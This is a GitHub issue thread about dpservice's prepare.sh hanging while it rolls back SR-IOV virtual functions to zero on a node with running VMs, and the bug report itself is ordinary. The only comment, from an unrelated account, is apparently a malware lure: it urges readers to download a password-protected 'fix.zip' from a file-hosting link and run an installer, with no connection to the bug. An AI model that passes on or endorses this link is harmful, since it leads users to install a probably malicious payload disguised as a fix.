### ISSUE TITLE
Prepare script gets stuck on rollback of numvfs

### ISSUE THREAD

**Issue by PlagueCZ** [ironcore-dev/dpservice#599]
If setting eswitch mode fails, `prepare.sh` tries to set number of VFs to zero.

This is a problem if VMs are already up and running, because this action of setting to zero gets stuck (I think on waiting for all VMs to release the sriov VF device).

This happend on an OSC compute node when testing the multiport e-switch. Something was not working so the prepare script wanted to roll the number of VFs to zero, thus blocking the card till I manually evicted all VMs (and broke the stack in the process).

I think simply logging the error for the operator to fix it is better as then even on error, the rest of the machine stays configured the way it was before.

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
